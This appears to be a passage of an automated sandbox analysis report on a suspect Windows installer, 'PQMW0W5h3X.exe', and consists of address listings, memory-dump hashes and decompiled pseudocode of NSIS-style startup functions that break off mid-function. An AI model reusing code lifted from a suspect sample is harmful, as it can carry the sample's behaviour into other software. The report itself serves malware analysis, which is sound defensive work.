                                                                                                                          0x0040659c
                                                                                                                          0x0040659f
                                                                                                                          0x004065a2
                                                                                                                          0x004065ac
                                                                                                                          0x00000000
                                                                                                                          0x004065ac
                                                                                                                          0x00406597
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004065b8
                                                                                                                          0x004065bc
                                                                                                                          0x004065c3
                                                                                                                          0x004065c6
                                                                                                                          0x004065c9
                                                                                                                          0x004065be
                                                                                                                          0x004065be
                                                                                                                          0x004065be
                                                                                                                          0x004065cc
                                                                                                                          0x004065cf
                                                                                                                          0x004065d2
                                                                                                                          0x004065d2
                                                                                                                          0x004065d5
                                                                                                                          0x004065d8
                                                                                                                          0x004065db
                                                                                                                          0x004065db
                                                                                                                          0x004065de
                                                                                                                          0x004065e5
                                                                                                                          0x004065ea
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406678
                                                                                                                          0x00406678
                                                                                                                          0x0040667c
                                                                                                                          0x00406a1a
                                                                                                                          0x00000000
                                                                                                                          0x00406a1a
                                                                                                                          0x00406682
                                                                                                                          0x00406685
                                                                                                                          0x00406688
                                                                                                                          0x0040668c
                                                                                                                          0x0040668f
                                                                                                                          0x00406695
                                                                                                                          0x00406697
                                                                                                                          0x00406697
                                                                                                                          0x00406697
                                                                                                                          0x0040669a
                                                                                                                          0x0040669d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004066fb
                                                                                                                          0x004066fb
                                                                                                                          0x004066ff
                                                                                                                          0x00406a26
                                                                                                                          0x00000000
                                                                                                                          0x00406a26
                                                                                                                          0x00406705
                                                                                                                          0x00406708
                                                                                                                          0x0040670b
                                                                                                                          0x0040670f
                                                                                                                          0x00406712
                                                                                                                          0x00406718
                                                                                                                          0x0040671a
                                                                                                                          0x0040671a
                                                                                                                          0x0040671a
                                                                                                                          0x0040671d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004064cb
                                                                                                                          0x004064cb
                                                                                                                          0x004064ce
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040680a
                                                                                                                          0x0040680e
                                                                                                                          0x00406830
                                                                                                                          0x00406833
                                                                                                                          0x0040683d
                                                                                                                          0x00000000
                                                                                                                          0x0040683d
                                                                                                                          0x00406810
                                                                                                                          0x00406813
                                                                                                                          0x00406817
                                                                                                                          0x0040681a
                                                                                                                          0x0040681a
                                                                                                                          0x0040681d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004068c7
                                                                                                                          0x004068cb
                                                                                                                          0x004068e9
                                                                                                                          0x004068e9
                                                                                                                          0x004068e9
                                                                                                                          0x004068f0
                                                                                                                          0x004068f7
                                                                                                                          0x004068fe
                                                                                                                          0x004068fe
                                                                                                                          0x00000000
                                                                                                                          0x004068fe
                                                                                                                          0x004068cd
                                                                                                                          0x004068d0
                                                                                                                          0x004068d3
                                                                                                                          0x004068d6
                                                                                                                          0x004068dd
                                                                                                                          0x00406821
                                                                                                                          0x00406821
                                                                                                                          0x00406824
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004069b8
                                                                                                                          0x004069bb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004065f2
                                                                                                                          0x004065f4
                                                                                                                          0x004065fb
                                                                                                                          0x004065fc
                                                                                                                          0x004065fe
                                                                                                                          0x00406601
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406609
                                                                                                                          0x0040660c
                                                                                                                          0x0040660f
                                                                                                                          0x00406611
                                                                                                                          0x00406613
                                                                                                                          0x00406613
                                                                                                                          0x00406614
                                                                                                                          0x00406617
                                                                                                                          0x0040661e
                                                                                                                          0x00406621
                                                                                                                          0x0040662f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406905
                                                                                                                          0x00406905
                                                                                                                          0x00406908
                                                                                                                          0x0040690f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406914
                                                                                                                          0x00406914
                                                                                                                          0x00406918
                                                                                                                          0x00406a50
                                                                                                                          0x00000000
                                                                                                                          0x00406a50
                                                                                                                          0x0040691e
                                                                                                                          0x00406921
                                                                                                                          0x00406924
                                                                                                                          0x00406928
                                                                                                                          0x0040692b
                                                                                                                          0x00406931
                                                                                                                          0x00406933
                                                                                                                          0x00406933
                                                                                                                          0x00406933
                                                                                                                          0x00406936
                                                                                                                          0x00406939
                                                                                                                          0x00406939
                                                                                                                          0x00406939
                                                                                                                          0x00406939
                                                                                                                          0x0040693c
                                                                                                                          0x0040693c
                                                                                                                          0x00406940
                                                                                                                          0x004069a0
                                                                                                                          0x004069a3
                                                                                                                          0x004069a8
                                                                                                                          0x004069a9
                                                                                                                          0x004069ab
                                                                                                                          0x004069ad
                                                                                                                          0x004069b0
                                                                                                                          0x00000000
                                                                                                                          0x004069b0
                                                                                                                          0x00406942
                                                                                                                          0x00406948
                                                                                                                          0x0040694b
                                                                                                                          0x0040694e
                                                                                                                          0x00406951
                                                                                                                          0x00406954
                                                                                                                          0x00406957
                                                                                                                          0x0040695a
                                                                                                                          0x0040695d
                                                                                                                          0x00406960
                                                                                                                          0x00406963
                                                                                                                          0x0040697c
                                                                                                                          0x0040697f
                                                                                                                          0x00406982
                                                                                                                          0x00406985
                                                                                                                          0x00406989
                                                                                                                          0x0040698b
                                                                                                                          0x0040698b
                                                                                                                          0x0040698c
                                                                                                                          0x0040698f
                                                                                                                          0x00406965
                                                                                                                          0x00406965
                                                                                                                          0x0040696d
                                                                                                                          0x00406972
                                                                                                                          0x00406974
                                                                                                                          0x00406977
                                                                                                                          0x00406977
                                                                                                                          0x00406992
                                                                                                                          0x00406999
                                                                                                                          0x00000000
                                                                                                                          0x0040699b
                                                                                                                          0x00000000
                                                                                                                          0x0040699b
                                                                                                                          0x00000000
                                                                                                                          0x00406637
                                                                                                                          0x0040663a
                                                                                                                          0x00406670
                                                                                                                          0x004067a0
                                                                                                                          0x004067a0
                                                                                                                          0x004067a0
                                                                                                                          0x004067a0
                                                                                                                          0x004067a3
                                                                                                                          0x004067a3
                                                                                                                          0x004067a6
                                                                                                                          0x004067a8
                                                                                                                          0x00406a32
                                                                                                                          0x00000000
                                                                                                                          0x00406a32
                                                                                                                          0x004067ae
                                                                                                                          0x004067b1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004067b7
                                                                                                                          0x004067bb
                                                                                                                          0x004067be
                                                                                                                          0x004067be
                                                                                                                          0x004067be
                                                                                                                          0x00000000
                                                                                                                          0x004067be
                                                                                                                          0x0040663c
                                                                                                                          0x0040663e
                                                                                                                          0x00406640
                                                                                                                          0x00406642
                                                                                                                          0x00406645
                                                                                                                          0x00406646
                                                                                                                          0x00406648
                                                                                                                          0x0040664a
                                                                                                                          0x0040664d
                                                                                                                          0x00406650
                                                                                                                          0x00406666
                                                                                                                          0x0040666b
                                                                                                                          0x004066a3
                                                                                                                          0x004066a3
                                                                                                                          0x004066a7
                                                                                                                          0x004066d3
                                                                                                                          0x004066d5
                                                                                                                          0x004066dc
                                                                                                                          0x004066df
                                                                                                                          0x004066e2
                                                                                                                          0x004066e2
                                                                                                                          0x004066e7
                                                                                                                          0x004066e7
                                                                                                                          0x004066e9
                                                                                                                          0x004066ec
                                                                                                                          0x004066f3
                                                                                                                          0x004066f6
                                                                                                                          0x00406723
                                                                                                                          0x00406723
                                                                                                                          0x00406726
                                                                                                                          0x00406729
                                                                                                                          0x0040679d
                                                                                                                          0x0040679d
                                                                                                                          0x0040679d
                                                                                                                          0x00000000
                                                                                                                          0x0040679d
                                                                                                                          0x0040672b
                                                                                                                          0x00406731
                                                                                                                          0x00406734
                                                                                                                          0x00406737
                                                                                                                          0x0040673a
                                                                                                                          0x0040673d
                                                                                                                          0x00406740
                                                                                                                          0x00406743
                                                                                                                          0x00406746
                                                                                                                          0x00406749
                                                                                                                          0x0040674c
                                                                                                                          0x00406765
                                                                                                                          0x00406767
                                                                                                                          0x0040676a
                                                                                                                          0x0040676b
                                                                                                                          0x0040676e
                                                                                                                          0x00406770
                                                                                                                          0x00406773
                                                                                                                          0x00406775
                                                                                                                          0x00406777
                                                                                                                          0x0040677a
                                                                                                                          0x0040677c
                                                                                                                          0x0040677f
                                                                                                                          0x00406783
                                                                                                                          0x00406785
                                                                                                                          0x00406785
                                                                                                                          0x00406786
                                                                                                                          0x00406789
                                                                                                                          0x0040678c
                                                                                                                          0x0040674e
                                                                                                                          0x0040674e
                                                                                                                          0x00406756
                                                                                                                          0x0040675b
                                                                                                                          0x0040675d
                                                                                                                          0x00406760
                                                                                                                          0x00406760
                                                                                                                          0x0040678f
                                                                                                                          0x00406796
                                                                                                                          0x00406720
                                                                                                                          0x00406720
                                                                                                                          0x00406720
                                                                                                                          0x00406720
                                                                                                                          0x00000000
                                                                                                                          0x00406798
                                                                                                                          0x00000000
                                                                                                                          0x00406798
                                                                                                                          0x00406796
                                                                                                                          0x004066a9
                                                                                                                          0x004066ac
                                                                                                                          0x004066ae
                                                                                                                          0x004066b1
                                                                                                                          0x004066b4
                                                                                                                          0x004066b7
                                                                                                                          0x004066b9
                                                                                                                          0x004066bc
                                                                                                                          0x004066bf
                                                                                                                          0x004066bf
                                                                                                                          0x004066c2
                                                                                                                          0x004066c2
                                                                                                                          0x004066c5
                                                                                                                          0x004066cc
                                                                                                                          0x004066a0
                                                                                                                          0x004066a0
                                                                                                                          0x004066a0
                                                                                                                          0x004066a0
                                                                                                                          0x00000000
                                                                                                                          0x004066ce
                                                                                                                          0x00000000
                                                                                                                          0x004066ce
                                                                                                                          0x004066cc
                                                                                                                          0x00406652
                                                                                                                          0x00406655
                                                                                                                          0x00406657
                                                                                                                          0x0040665a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406544
                                                                                                                          0x00406544
                                                                                                                          0x00406548
                                                                                                                          0x00406a0e
                                                                                                                          0x00000000
                                                                                                                          0x00406a0e
                                                                                                                          0x0040654e
                                                                                                                          0x00406551
                                                                                                                          0x00406554
                                                                                                                          0x00406557
                                                                                                                          0x00406559
                                                                                                                          0x00406559
                                                                                                                          0x00406559
                                                                                                                          0x0040655c
                                                                                                                          0x0040655f
                                                                                                                          0x00406562
                                                                                                                          0x00406565
                                                                                                                          0x00406568
                                                                                                                          0x0040656b
                                                                                                                          0x0040656c
                                                                                                                          0x0040656e
                                                                                                                          0x0040656e
                                                                                                                          0x0040656e
                                                                                                                          0x00406571
                                                                                                                          0x00406574
                                                                                                                          0x00406577
                                                                                                                          0x0040657a
                                                                                                                          0x0040657a
                                                                                                                          0x0040657a
                                                                                                                          0x0040657d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004067c1
                                                                                                                          0x004067c1
                                                                                                                          0x004067c1
                                                                                                                          0x004067c5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004067cb
                                                                                                                          0x004067ce
                                                                                                                          0x004067d1
                                                                                                                          0x004067d4
                                                                                                                          0x004067d6
                                                                                                                          0x004067d6
                                                                                                                          0x004067d6
                                                                                                                          0x004067d9
                                                                                                                          0x004067dc
                                                                                                                          0x004067df
                                                                                                                          0x004067e2
                                                                                                                          0x004067e5
                                                                                                                          0x004067e8
                                                                                                                          0x004067e9
                                                                                                                          0x004067eb
                                                                                                                          0x004067eb
                                                                                                                          0x004067eb
                                                                                                                          0x004067ee
                                                                                                                          0x004067f1
                                                                                                                          0x004067f4
                                                                                                                          0x004067f7
                                                                                                                          0x004067fa
                                                                                                                          0x004067fe
                                                                                                                          0x00406800
                                                                                                                          0x00406803
                                                                                                                          0x00000000
                                                                                                                          0x00406805
                                                                                                                          0x00000000
                                                                                                                          0x00406805
                                                                                                                          0x00406803
                                                                                                                          0x00406a38
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406067

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                                                                                                                          • Instruction ID: bc715f9ab80968e75e2fbed037c5f1c5951903de2449374fee89636cff417fa3
                                                                                                                          • Opcode Fuzzy Hash: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                                                                                                                          • Instruction Fuzzy Hash: 52F18571D00229CBCF28DFA8C8946ADBBB1FF45305F25816ED856BB281D3785A96CF44
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00405E93, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405E93(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x422588); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x422588;
			}




                                                                                                                          0x00405e9e
                                                                                                                          0x00405ea7
                                                                                                                          0x00000000
                                                                                                                          0x00405eb4
                                                                                                                          0x00405eaa
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNELBASE(?,00422588,00421940,004057AF,00421940,00421940,00000000,00421940,00421940,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405E9E
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00405EAA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2295610775-0
                                                                                                                          • Opcode ID: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                                                                                                                          • Instruction ID: 22d16aeb20e1d117df59da4f29a20059377f8c00669f4036672bdba2b414caf9
                                                                                                                          • Opcode Fuzzy Hash: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                                                                                                                          • Instruction Fuzzy Hash: 95D0123190D520ABD7015738BD0C84B7A59DB553323508F32B465F53E0C7788D928AEA
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004035EB, Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E004035EB(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				int _t42;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t85;

				_t81 =  *0x423f50;
				_t20 = E00405F28(3);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x420538;
					"1033" = 0x7830;
					E00405A7F(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420538, 0);
					__eflags =  *0x420538;
					if(__eflags == 0) {
						E00405A7F(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407342, 0x420538, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E00405AF6("1033",  *_t20() & 0x0000ffff);
				}
				E004038B4(_t76, _t88);
				_t84 = "C:\\Users\\engineer\\AppData\\Local\\Temp";
				 *0x423fc0 =  *0x423f58 & 0x00000020;
				 *0x423fdc = 0x10000;
				if(E0040576C(_t88, "C:\\Users\\engineer\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040576C(_t96, _t84) == 0) {
						E00405BBA(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x423f40, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423728 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E004038B4(_t76, __eflags);
							__eflags =  *0x423fe0;
							if( *0x423fe0 != 0) {
								_t31 = E00404F56(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42370c;
								if( *0x42370c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420510, 5);
							_t37 = E00405EBA("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								E00405EBA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x4236e0);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x4236e0);
								 *0x423704 = _t85;
								RegisterClassA(0x4236e0);
							}
							_t42 = DialogBoxParamA( *0x423f40,  *0x423720 + 0x00000069 & 0x0000ffff, 0, E00403981, 0);
							E0040353B(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x423f40;
						 *0x4236f4 = _t28;
						_v20 = 0x624e5f;
						 *0x4236e4 = E00401000;
						 *0x4236f0 =  *0x423f40;
						 *0x423704 =  &_v20;
						if(RegisterClassA(0x4236e0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420510 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423f40, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t79 = 0x422ee0;
					E00405A7F( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) +  *0x423f78, 0x422ee0, 0);
					_t62 =  *0x422ee0; // 0x43
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x422ee1;
						 *((char*)(E004056B6(0x422ee1, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405B98(_t84, E0040568B(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E004056D2(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                                                                                                          0x004035f1
                                                                                                                          0x004035fa
                                                                                                                          0x00403601
                                                                                                                          0x00403603
                                                                                                                          0x00403617
                                                                                                                          0x00403629
                                                                                                                          0x00403633
                                                                                                                          0x00403638
                                                                                                                          0x0040363e
                                                                                                                          0x00403651
                                                                                                                          0x00403651
                                                                                                                          0x0040365c
                                                                                                                          0x00403605
                                                                                                                          0x00403610
                                                                                                                          0x00403610
                                                                                                                          0x00403661
                                                                                                                          0x0040366b
                                                                                                                          0x00403674
                                                                                                                          0x00403679
                                                                                                                          0x0040368a
                                                                                                                          0x00403711
                                                                                                                          0x00403719
                                                                                                                          0x00403722
                                                                                                                          0x00403722
                                                                                                                          0x00403738
                                                                                                                          0x0040373e
                                                                                                                          0x0040374c
                                                                                                                          0x004037db
                                                                                                                          0x004037e3
                                                                                                                          0x004037ed
                                                                                                                          0x004037f2
                                                                                                                          0x004037f8
                                                                                                                          0x00403882
                                                                                                                          0x00403887
                                                                                                                          0x00403889
                                                                                                                          0x004038a5
                                                                                                                          0x00000000
                                                                                                                          0x004038a5
                                                                                                                          0x0040388b
                                                                                                                          0x00403891
                                                                                                                          0x00403899
                                                                                                                          0x00403899
                                                                                                                          0x00000000
                                                                                                                          0x00403891
                                                                                                                          0x00403806
                                                                                                                          0x00403811
                                                                                                                          0x00403816
                                                                                                                          0x00403818
                                                                                                                          0x0040381f
                                                                                                                          0x0040381f
                                                                                                                          0x0040382a
                                                                                                                          0x00403832
                                                                                                                          0x00403834
                                                                                                                          0x00403836
                                                                                                                          0x0040383f
                                                                                                                          0x00403842
                                                                                                                          0x00403848
                                                                                                                          0x00403848
                                                                                                                          0x00403867
                                                                                                                          0x00403878
                                                                                                                          0x00000000
                                                                                                                          0x0040387d
                                                                                                                          0x004037e5
                                                                                                                          0x004037e7
                                                                                                                          0x00000000
                                                                                                                          0x00403752
                                                                                                                          0x00403752
                                                                                                                          0x00403758
                                                                                                                          0x00403762
                                                                                                                          0x0040376a
                                                                                                                          0x00403774
                                                                                                                          0x0040377a
                                                                                                                          0x00403788
                                                                                                                          0x004038aa
                                                                                                                          0x004038aa
                                                                                                                          0x00000000
                                                                                                                          0x004038aa
                                                                                                                          0x0040378e
                                                                                                                          0x00403797
                                                                                                                          0x004037d6
                                                                                                                          0x00000000
                                                                                                                          0x004037d6
                                                                                                                          0x00403690
                                                                                                                          0x00403690
                                                                                                                          0x00403695
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040369f
                                                                                                                          0x004036af
                                                                                                                          0x004036b4
                                                                                                                          0x004036bb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004036bf
                                                                                                                          0x004036c1
                                                                                                                          0x004036ce
                                                                                                                          0x004036ce
                                                                                                                          0x004036d6
                                                                                                                          0x004036dc
                                                                                                                          0x00403704
                                                                                                                          0x0040370c
                                                                                                                          0x00000000
                                                                                                                          0x004036ee
                                                                                                                          0x004036ef
                                                                                                                          0x004036f8
                                                                                                                          0x004036fe
                                                                                                                          0x004036ff
                                                                                                                          0x00000000
                                                                                                                          0x004036ff
                                                                                                                          0x004036fa
                                                                                                                          0x004036fc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004036fc
                                                                                                                          0x004036dc

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                                                                                            • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                                                                                                                          • lstrcatA.KERNEL32(1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\PQMW0W5h3X.exe" ,00000000), ref: 0040365C
                                                                                                                          • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 004036D1
                                                                                                                          • lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000), ref: 004036E4
                                                                                                                          • GetFileAttributesA.KERNEL32(Call), ref: 004036EF
                                                                                                                          • LoadImageA.USER32 ref: 00403738
                                                                                                                            • Part of subcall function 00405AF6: wsprintfA.USER32 ref: 00405B03
                                                                                                                          • RegisterClassA.USER32 ref: 0040377F
                                                                                                                          • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403797
                                                                                                                          • CreateWindowExA.USER32 ref: 004037D0
                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403806
                                                                                                                          • GetClassInfoA.USER32 ref: 00403832
                                                                                                                          • GetClassInfoA.USER32 ref: 0040383F
                                                                                                                          • RegisterClassA.USER32 ref: 00403848
                                                                                                                          • DialogBoxParamA.USER32 ref: 00403867
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                          • String ID: "C:\Users\user\Desktop\PQMW0W5h3X.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$6B
                                                                                                                          • API String ID: 1975747703-830523029
                                                                                                                          • Opcode ID: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                                                                                                                          • Instruction ID: 6624008b3449f808402c67b3262d240ca0850aee1e0dcbc9c28568ef27b6b269
                                                                                                                          • Opcode Fuzzy Hash: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                                                                                                                          • Instruction Fuzzy Hash: 6A61E9B17002047EE620AF619D45E3B7ABCEB4474AF40457FF941B22E2D77D9E428A2D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00402C55, Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 78%
                                                                                                                          			E00402C55(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				long _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				long _t70;
				void* _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				void* _t85;
				signed int _t87;
				void* _t89;
				long _t90;
				long _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\engineer\\Desktop\\PQMW0W5h3X.exe";
				 *0x423f4c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\engineer\\Desktop\\PQMW0W5h3X.exe", 0x400);
				_t89 = E0040586F(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409014 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\engineer\\Desktop";
				E00405B98("C:\\Users\\engineer\\Desktop", _t91);
				E00405B98(0x42c000, E004056D2(_t92));
				_t50 = GetFileSize(_t89, 0);
				 *0x41f0e8 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BF1(1);
					if( *0x423f54 == _t82) {
						goto L29;
					}
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E004030B3( *0x423f54 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00402E8E(); // executed
						if(_t57 == _v24) {
							 *0x423f50 = _t94;
							 *0x423f58 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x423f5c =  *0x423f5c + 1;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405830(0x423f60, _t94 + 4, 0x40);
							return 0;
						}
						goto L29;
					}
